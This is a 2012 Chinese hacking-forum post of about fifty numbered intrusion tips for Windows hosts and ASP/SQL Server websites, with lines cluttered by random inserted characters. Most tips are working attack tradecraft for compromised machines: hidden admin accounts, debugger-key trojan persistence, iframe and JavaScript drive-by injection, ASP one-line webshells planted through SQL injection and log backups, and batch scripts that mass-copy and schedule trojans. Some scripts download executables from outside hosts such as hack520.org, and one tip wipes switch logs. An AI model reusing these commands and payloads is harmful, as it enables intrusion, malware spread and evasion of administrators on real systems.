找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2379|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,3 M# h2 c7 v; S  h" N7 k
cacls C:\windows\system32 /G hqw20:R
) N# ~, D- i, r思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
! F8 C' K2 m0 Z' t/ M5 j4 l恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. Q- G; x. e: e3 C& o! S! W9 D, K& K7 T: t9 S) i
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! n1 ]2 x! c6 d$ Y7 F4 h& L
' w4 K6 C: F( J; r- h! _  l3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, @$ E: s$ i: f2 m" g, r* J- }6 I5 ]& u& Q- I% Q
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号# s3 f' Q3 A: ], m/ L. S# D& p
. v; P; k1 _* I
5、利用INF文件来修改注册表
: m/ n% _9 p! B% i[Version]  ~1 C8 I9 j2 H1 w: h
Signature="$CHICAGO$"5 w7 T) v: d3 l, H+ g
[Defaultinstall]7 S; ~0 ~; S  J/ }, P1 w. v2 b
addREG=Ating
* S( x* d, Q) R[Ating]1 K, ~" w( S! `+ `1 T
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, X) z  h, w/ W% U. u以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
% w, M1 ?4 L3 [+ k$ Lrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
/ Z. }/ @) s4 V* i0 F. h2 b其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU6 }# L. Q% J9 G; l) C/ |
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU2 V* ^- S8 `5 p, `
HKEY_CURRENT_CONFIG 简写为 HKCC
& C- x& x3 H: n; H: s+ W0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
" w) v7 U# l9 K  C4 f2 G- E"1"这里代表是写入或删除注册表键值中的具体数据* ]; G" a) j! K8 d- }6 X0 M

5 a9 V! f7 b2 J6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
$ O; v# n+ a6 w: ~5 P多了一步就是在防火墙里添加个端口,然后导出其键值$ ^( z! ]+ J  W0 }/ x$ s" e
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]# d( U; g3 \5 H- @, s0 I

: v" w! q# h( a$ |1 ^7 @! }7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽& o3 f. }  o+ Q6 ?2 f. p. A4 j
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。' L; m/ Z3 Q3 M1 D9 J

9 q% {) f* F9 ~& k8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。3 S6 e) j* `7 L2 Z( ~
, T: K0 J7 ?! M$ ?- [1 w/ K, g, C7 W
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
+ `' g( z  j+ X0 @+ B, e可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' i7 W& x* O" ~: i
; K* o& X2 R& V: y- ^8 d! {; O; P
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”3 M$ M9 z- Q- V5 G* v! ~1 M1 {

; E, O! }% I- U: q9 @" v- G, O11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
4 U9 |5 f  Z+ W; T! T' x用法:xsniff –pass –hide –log pass.txt
2 m' n9 x) s. \* _, ?, a' n1 v1 n7 `  X* A
12、google搜索的艺术
$ P* E. ~6 z7 I搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ U  ^* Z$ X; M8 Y或“字符串的语法错误”可以找到很多sql注入漏洞。
8 _7 k: d2 f1 F+ B6 u2 k* I7 a1 _+ I. G
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ M+ O0 ~9 {5 k; I+ Y* A$ `9 f' T: L$ x1 }7 k2 ^
14、cmd中输入 nc –vv –l –p 19877 t' R" ]! u4 G/ i0 w  M) x$ N
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃) w, n; P0 s8 N) R, w& I% H: L

  q7 w) \7 M. t4 `- q8 w4 Q15、制作T++木马,先写个ating.hta文件,内容为( i% t1 J/ ]: @7 u/ h
<script language="VBScript">
. V" H$ T5 s+ ~! n: P! Bset wshshell=createobject ("wscript.shell" )
6 k3 P" b4 `. t: ~  X$ ^a=wshshell.run("你马的名称",1)
; R0 v5 D+ G% I; b4 ]- n. o+ `window.close& l3 {( Y( h1 f: g) m
</script>
% y+ d5 r) [% o8 @! W* B% W再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。  T: g0 a5 j5 r0 Y9 F2 r" g
: X) n7 c) t' V8 d# _  B
16、搜索栏里输入
9 L) h6 `4 A- z关键字%'and 1=1 and '%'='
( y( k( \' |8 |! @$ Y5 l$ d关键字%'and 1=2 and '%'='" Q. I* @/ N# ?) O
比较不同处 可以作为注入的特征字符# @" I$ q7 a2 j; Z" l
  ]8 ?1 ?* f" b) m2 l( k) r
17、挂马代码<html>
3 t$ o2 s0 P6 A/ {: i: [: c<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>' t& F' n4 Q* x5 A+ M5 ^( x# I2 U
</html>2 H1 a8 L$ H; G" {$ ?# T+ |

( A9 T" [( @/ @' j* ^6 G18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,& D: c2 @: d2 m- K0 P) n
net localgroup administrators还是可以看出Guest是管理员来。$ O1 m1 M) u: f9 p% l7 h& ?) o
1 F0 f6 j* r9 X: i0 R0 u. S
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- l* n/ w, \( X" @( k6 G# T4 |# {
用法: 安装: instsrv.exe 服务名称 路径2 P! b5 X0 u. u" s1 ?* H# q
卸载: instsrv.exe 服务名称 REMOVE
6 P, L. S9 `$ |! a& ?+ w. @8 e7 o7 x6 j2 k6 [0 s

4 @# V% p: {& g4 m/ c7 L21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉6 G7 m# f, c7 ^
不能注入时要第一时间想到%5c暴库。
+ w  i" L; S) v% Z+ S& E
: p8 i/ y- W  i8 x22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
$ F2 o( T, p, m- n" \# I3 C4 t( {( R0 f
23、缺少xp_cmdshell时2 h! X& F& }7 l; y8 `) y
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'9 i) Q# N) u# ^: I8 h6 j, L
假如恢复不成功,可以尝试直接加用户(针对开3389的): t1 H3 R6 P1 c! n2 Y  i+ P7 N
declare @o int
: ~; [  y' {9 Lexec sp_oacreate 'wscript.shell',@o out* e4 R) p; \8 {. ]+ r
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员3 g' n+ _+ e/ Z' d

$ W/ E6 ^- D0 t  Y; p# t# b7 X24.批量种植木马.bat
2 G3 e, S  u1 n8 v/ cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 e( X) m2 y( U8 V  V/ gfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间$ `2 D3 J% a+ I: ^4 U
扫描地址.txt里每个主机名一行 用\\开头
4 B- Y; q/ M, g; f3 p* c
7 W. D; f- E& j, Y3 o6 K25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。; s- l, S# @2 O' S+ X

2 L) H' a$ x$ K: L" y% d: S' d26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 S# J, l- R6 S% U& z* Q9 u5 g; o
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.) c, m4 q  M+ V* {/ Q
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
3 _8 A& Q  @6 {& F; A/ Q& G- ], F
1 y+ E0 Q' b. z9 N; f' K$ |27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
: c; ?3 {. O. m5 K! Y7 a3 v- w然后用#clear logg和#clear line vty *删除日志
, C5 R# L' j' c6 g2 `' ]% v8 y! O  x0 Q% z
28、电脑坏了省去重新安装系统的方法+ _( |$ Z3 ~3 T) o, C& E
纯dos下执行,
" }5 g% ~7 m9 n2 j! N. B+ sxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config: s4 e! I+ T' }; Q
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config4 w: H) m) ^8 B5 W# O$ \
/ g! ^/ \$ a' L. e. ?# b4 ^. D+ l
29、解决TCP/IP筛选 在注册表里有三处,分别是:
# x  h, G) J8 f, p; zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; W, g+ ]) q) L( P/ J. xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 \+ N* ~4 V2 X) X4 t, S" nHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" D9 _7 m5 G' z% e6 Y4 @8 ^分别用
6 s) Z5 U* v; h5 U5 V1 @2 Vregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, G3 ^7 y0 X% l, U4 h! w
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- T" i9 x: Y! ]+ G1 Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: q* W$ K7 C! O) x) y命令来导出注册表项' e  w& P1 ]$ J5 x& K
然后把三个文件里的EnableSecurityFilters"=dword:00000001,4 {$ b' r$ r* {1 t/ q
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用, a0 n7 `" H# M) ~- z. Z  m7 u
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, c: O: v  Q' N% M  Z6 e
0 W- n# _- g4 X( T6 n# ~3 s/ H* ]; B
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
' h: z8 v. w3 [: MSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
# T: G6 {& Q& N" o+ r
3 U6 |! v) U6 D31、全手工打造开3389工具
$ v1 `- h3 F- g打开记事本,编辑内容如下:
1 A0 T( R/ V: W6 k) Y# \echo [Components] > c:\sql
6 U8 b9 K9 f$ c  K$ D4 \5 |echo TSEnable = on >> c:\sql
/ f) a- W; Y6 i# y5 {* S1 t7 hsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 G. G# P* ?, j2 K; |, D! r编辑好后存为BAT文件,上传至肉鸡,执行
3 T3 h* F) q# H, o/ C/ w, q5 ~. @* O0 q# A- D9 Q0 l* v
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
  p' a8 b# e; Y; Y, u% v/ x: x2 c: R& u8 t4 x8 |
33、让服务器重启- u! Q% W$ ~' O8 G' q
写个bat死循环:/ ?) `2 X# R' p8 U- T+ N
@echo off* f5 \' [9 E& p7 I: S/ b
:loop12 ]) Y1 A: f: n( F
cls
0 A! f: P0 o. Ustart cmd.exe8 `2 j+ _1 E7 |" x
goto loop1# c, C! q. @9 {3 c7 a
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- y0 m7 {" g: B" \- s* R7 |
  G. k) P9 `5 p, I) {: ?
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,6 F, D; K: q9 A4 ]
@echo off! w% A* Q6 H( \( X2 Z: ]# x
date /t >c:/3389.txt
" ]$ ], ]+ `9 S. _% ^. B1 ]time /t >>c:/3389.txt% `- h5 u( `, \# A! G1 V& g% V
attrib +s +h c:/3389.bat
# S/ b+ {0 }) [7 [attrib +s +h c:/3389.txt8 j- |5 g$ X, `6 q- a
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
7 I/ c, y& _# y0 U/ G+ W' x) v3 ~并保存为3389.bat
& {1 E6 A5 j" n; y3 r$ |打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号! r( t  ~: r# L. U6 E. K8 A

7 G1 O/ B9 f: q/ R1 l3 a0 K35、有时候提不了权限的话,试试这个命令,在命令行里输入:. |# i" G, ~! ?+ y2 E9 K
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 }7 n0 Q+ [' U& _
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。% [* X. m" W& V" u! v( \* e
7 C5 P% W& x# n, Q5 b$ L' d5 J
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件' I. F( y# D$ F! b3 C6 E
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
9 f  G3 P3 {, O) h6 lecho 你的FTP账号 >>c:\1.bat //输入账号
0 ^% B9 L# t8 U' Z. j6 j( L! M" jecho 你的FTP密码 >>c:\1.bat //输入密码
" q4 u2 {+ \1 techo bin >>c:\1.bat //登入
/ {; _+ j- p/ U( p5 {" becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么6 O! I' O" L0 ]% q6 Z1 L/ c% ]/ n
echo bye >>c:\1.bat //退出5 D' M) i: Z: u. K1 j
然后执行ftp -s:c:\1.bat即可
( a: w! D" z/ Z( ~) e2 c
; X7 t6 i( v7 D* {6 U7 K* e37、修改注册表开3389两法# y  _" h9 P. I
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& s4 x: L8 g3 U5 H7 Qecho Windows Registry Editor Version 5.00 >>3389.reg- n3 ]0 N" \# V8 f8 V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
! s0 K6 z- e! L+ |" z. g7 iecho "Enabled"="0" >>3389.reg9 ?1 K: z( v5 j9 B7 z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
0 d8 V: q' T) F3 X, M( K5 gNT\CurrentVersion\Winlogon] >>3389.reg
4 y6 S& o( X1 ^% {echo "ShutdownWithoutLogon"="0" >>3389.reg
6 s0 T& p( \6 b% D4 q( Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
! I, J; Y) l. l2 x>>3389.reg
2 z3 n; b. p& G1 Z% V9 qecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg" |0 D$ q% w: k$ {  ?( U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]" F  R4 m+ F6 X6 {
>>3389.reg
2 ~+ \. v, m% k, iecho "TSEnabled"=dword:00000001 >>3389.reg
3 m5 c8 |' H& \( Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg" ?' H! s: \& g, a* R/ S
echo "Start"=dword:00000002 >>3389.reg3 L( l; r, M- ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
( H! M( X! k( F/ t" f>>3389.reg) R  v6 f; }' C+ P
echo "Start"=dword:00000002 >>3389.reg
/ w% [6 a& w. A6 e3 ?( Yecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
% a" S7 _0 R: N) Z+ Uecho "Hotkey"="1" >>3389.reg8 m9 [8 y3 Q" S9 q3 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" G& M  s) f' o9 Y( C- F* Q3 c
Server\Wds\rdpwd\Tds\tcp] >>3389.reg- W: e' @: G' p: t
echo "PortNumber"=dword:00000D3D >>3389.reg% j" b1 W9 Z2 ], w  V6 \, q  ?' v+ b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- J. l& z  M. i5 k2 A9 O0 `2 rServer\WinStations\RDP-Tcp] >>3389.reg! e: \1 U- ^5 ?9 t; e+ V
echo "PortNumber"=dword:00000D3D >>3389.reg0 L% e3 d: P: O: f4 @
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
, q9 n0 h. @* R# _# t3 _: r(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)) x/ M$ P( L/ m( l, `# z, L
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
2 r3 Z- |/ h9 v+ E3 W0 D# y7 b(2)winxp和win2003终端开启
5 f" r; o+ B! O3 d- P8 u用以下ECHO代码写一个REG文件:5 i3 ?. Y( [; z0 f3 K9 J
echo Windows Registry Editor Version 5.00>>3389.reg6 O- A: y# G" p( a4 {/ D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* H; |7 }4 P- E. x# j
Server]>>3389.reg! x2 Q8 p# r3 `/ d
echo "fDenyTSConnections"=dword:00000000>>3389.reg
5 w0 d/ m) B2 m6 G# D" P2 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& z0 s% p) e0 F! P, z7 GServer\Wds\rdpwd\Tds\tcp]>>3389.reg+ Y+ G' `5 y/ q: f. i
echo "PortNumber"=dword:00000d3d>>3389.reg
8 |3 |6 P, N: x$ G2 ?$ Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ @8 D9 u' x( P* O7 G
Server\WinStations\RDP-Tcp]>>3389.reg- S6 L8 U# v+ c. M1 ~
echo "PortNumber"=dword:00000d3d>>3389.reg
. [' W8 J' t% h" A+ e, F然后regedit /s 3389.reg del 3389.reg: z- g+ r9 ?4 U2 s, d
XP下不论开终端还是改终端端口都不需重启
7 @  r# R6 d: C
2 L' d3 G5 a& e7 t3 s" V38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃, v. L' y8 w" V6 T5 m- P5 h( d
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'& i0 n; Y8 ^/ U8 k$ Q) ^, I0 F

/ k4 u5 @) S& ?! j1 a5 D3 w2 K# q39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!8 K/ c8 `# d; U7 ^
(1)数据库文件名应复杂并要有特殊字符
2 p) S) W# l  U% S( o1 \6 z$ N(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
6 h1 I( K3 _3 W- G5 f) D6 z将conn.asp文档中的
! N3 b5 B# d$ w& F( V/ GDBPath = Server.MapPath("数据库.mdb")
- N, v7 v% i2 g$ b' nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
7 Y* @' u0 B* k) e1 m* ?& Y2 C1 {  `1 D
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& \0 u# P$ U" o. r4 r9 @(3)不放在WEB目录里
+ }/ Z! \2 `/ y0 M8 h* X& P
7 C4 S1 m# n* A% v0 p* n40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉* O8 T8 N; ]9 {$ @
可以写两个bat文件
7 n. t6 U9 l  r% N9 n@echo off& o0 Z) H6 c5 L
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe) q! l+ g% d5 u, H* Y2 V9 ?" l
@del c:\winnt\system32\query.exe9 Y" O- ^2 Q0 e/ e( K% |% S
@del %SYSTEMROOT%\system32\dllcache\query.exe" [- p: y! X! |; B
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
- ^! h; n% V) t. ?: m' J! u$ M! v" b! C- x8 l* e( j
@echo off
9 d4 A8 _& M+ U% w5 \) d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% O" ~$ X0 Q! x" o$ R/ k
@del c:\winnt\system32\tsadmin.exe9 A* Y' j$ L7 F: V
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
; T( M" i# X, t  y) I1 G# H8 @7 d3 {5 }! S' J; A
41、映射对方盘符) a5 A' b2 I8 y/ ~# E0 b+ t% I
telnet到他的机器上,' r2 G0 ?6 a3 g' a: S% w
net share 查看有没有默认共享 如果没有,那么就接着运行
0 ?" H9 K4 J) e. jnet share c$=c:
' B6 h' J- ?7 wnet share现在有c$
7 @" ?* d4 ^0 f6 b) }  }; a在自己的机器上运行
/ K3 q* [* C! P' Hnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 l1 I. Z/ p  ^9 r" _9 |7 J3 R- w; F* M0 K* A) n0 e" J
42、一些很有用的老知识
* T# j$ l2 t2 m% a$ Btype c:\boot.ini ( 查看系统版本 )3 l1 _6 A" ]* `- F7 I& U
net start (查看已经启动的服务)) E* d6 v5 ]% w" ^
query user ( 查看当前终端连接 )
$ }; H- V9 a+ @  U5 wnet user ( 查看当前用户 )
* a) @+ L9 G: t1 Gnet user 用户 密码/add ( 建立账号 )6 L$ ~: F2 y5 Y# y4 M, D, d8 e
net localgroup administrators 用户 /add (提升某用户为管理员)
# I6 c) s; d) Z$ E4 {ipconfig -all ( 查看IP什么的 )% \$ c5 j) K+ P" x8 l( q- ^
netstat -an ( 查看当前网络状态 )( b1 Y* U# q: |% ~) Q
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. a% F; `- E, o" T7 E) _克隆时Administrator对应1F4( F5 o' L+ R( F
guest对应1F5" ^* b: }! f- P7 c
tsinternetuser对应3E8
$ m7 }& p, m9 O* F1 g' {- n# z
8 H; z; P& q7 I/ W/ h2 ?/ P0 j43、如果对方没开3389,但是装了Remote Administrator Service
& g. Y! O$ }, x( E9 h! K用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接$ a+ z1 j1 y8 k" X* i! a
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
3 B/ W- @8 c& q; l2 b先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 l' Y4 M  c6 y; B" L! s) h0 {0 o/ f8 t# b/ R' e& E. |
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
! T! U$ W  E& c- ^本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
1 g7 X% j- l4 B9 A* }  D3 N# h/ a. n# d# D6 T) @
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
# _+ [) D( ~% pecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
9 `1 I8 y+ n3 R3 x* Z9 j" g8 r  x^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" m. d, m: ?% [1 u7 D. \) Y- ECreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ S; s8 y) u5 P0 G8 E+ G0 {
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
3 \- E- q; h. s$ }9 d(这是完整的一句话,其中没有换行符)
/ r! W: [* u* A5 R$ y然后下载:
; m( z) V* E" B! ~8 P! K1 g6 t" G+ Wcscript down.vbs http://www.hack520.org/hack.exe hack.exe/ k; `6 w2 s/ h$ i
) ^8 N! y. _6 D- _8 s0 u
46、一句话木马成功依赖于两个条件:" W3 E: \( s+ b
1、服务端没有禁止adodb.Stream或FSO组件
- Q1 C: H& A- _9 M+ \: t- T2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
5 p: Q, F3 D0 k& |1 Z4 m  e; e$ ^9 B: }* a
47、利用DB_OWNER权限进行手工备份一句话木马的代码:. s. k3 f- N! t& Y
;alter database utsz set RECOVERY FULL--6 K6 [  w! {5 F5 v
;create table cmd (a image)--+ y5 @/ f& o; _1 P( \: u4 n# D
;backup log utsz to disk = 'D:\cmd' with init--
; @% H/ w$ `; z  N: z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--, B( j' k4 [/ }
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
6 @% N9 Y/ a& w2 S" A5 Y注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
# q6 T6 z% N1 S' B0 \7 ^6 O; Q
% }/ s6 x* y2 I" N" \48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:8 w" J1 W& X6 g0 T7 v! y  {

1 c" b) ~& Y  {- g& Z( ^+ Q) H4 D用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 z/ [( [3 \  S0 O* P" R' l/ `' G# v所有会话用 'all'。0 A* q8 M( K% I- T9 d7 ?
-s sessionid 列出会话的信息。' P8 H7 B. f1 X' \: A" Z: z8 H
-k sessionid 终止会话。
( ]* [4 B7 O3 Y-m sessionid 发送消息到会话。0 U8 p. c8 _) M* x$ F

# l: ]/ q3 O7 Mconfig 配置 telnet 服务器参数。- _$ t* D+ i" m9 z3 m
- {; F% {0 [! i! h+ O' Q
common_options 为:
+ r: s- y9 p) c- f$ [8 r8 s% E-u user 指定要使用其凭据的用户) H4 C$ {3 K+ K
-p password 用户密码' n+ I5 Q/ |7 I" W0 w2 d
2 M2 ]& o. B+ K$ l
config_options 为:! X7 n7 K% F6 b) r' t& r
dom = domain 设定用户的默认域* ~0 W3 @/ x' M- i" ~6 T
ctrlakeymap = yes|no 设定 ALT 键的映射4 Q  W( g0 L4 c( ~& a
timeout = hh:mm:ss 设定空闲会话超时值
2 q. p/ r$ B: J4 b7 P, Qtimeoutactive = yes|no 启用空闲会话。" ^$ C0 ?" V  ]8 W1 a8 }
maxfail = attempts 设定断开前失败的登录企图数。
; z: A" g. P  W! M$ omaxconn = connections 设定最大连接数。
4 v$ ^7 p7 z4 A8 }, `port = number 设定 telnet 端口。
2 e, J8 S0 o. ]+ I( v& N0 M/ ~% hsec = [+/-]NTLM [+/-]passwd% r, w* w! T" b/ q! ]
设定身份验证机构
" {  U" L. I# ]. Z; v5 Q( ~3 T: cfname = file 指定审计文件名。
  _; X$ h  S, X, [( Y4 y) wfsize = size 指定审计文件的最大尺寸(MB)。
( V( e  T* o, |5 u# j: T- N% ^+ Tmode = console|stream 指定操作模式。
( k) B5 z( o0 C; o# Xauditlocation = eventlog|file|both7 {6 H9 \) U! t7 b& K2 Y7 ]
指定记录地点
( g9 O) H- t; |. H7 X4 G5 \audit = [+/-]user [+/-]fail [+/-]admin& {! j% m5 `4 s  f

, C' t+ i+ b. M# b) u9 P! T5 m) S49、例如:在IE上访问:  k/ W3 t& N! W0 |% y1 O
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/& y( a+ \) O+ H6 G
hack.txt里面的代码是:* @$ T+ d3 [( \
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& p+ P% u8 n, F5 ]$ \) m5 A3 ~
把这个hack.txt发到你空间就可以了!
4 @3 n7 _5 ^  o$ H5 u这个可以利用来做网马哦!' J5 ?" S5 i) o% b
0 z8 a- I5 \8 Y) U8 i' F- f
50、autorun的病毒可以通过手动限制!
" t! k2 `' @1 A( W: X4 h2 Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
/ m! }/ e& n2 ?* U8 }, e2,打开盘符用右键打开!切忌双击盘符~9 f6 V8 r9 K5 p
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
6 B0 j  ?2 u( d1 `! U% p# F3 b' ^6 y/ Q$ U) j/ N% H' W
51、log备份时的一句话木马:
# X0 Q2 u  H- e' _7 J0 ga).<%%25Execute(request("go"))%%25>8 l# P# q- F$ D' S3 X2 C4 J
b).<%Execute(request("go"))%>
% \5 g$ h! r0 M. O9 `c).%><%execute request("go")%><%
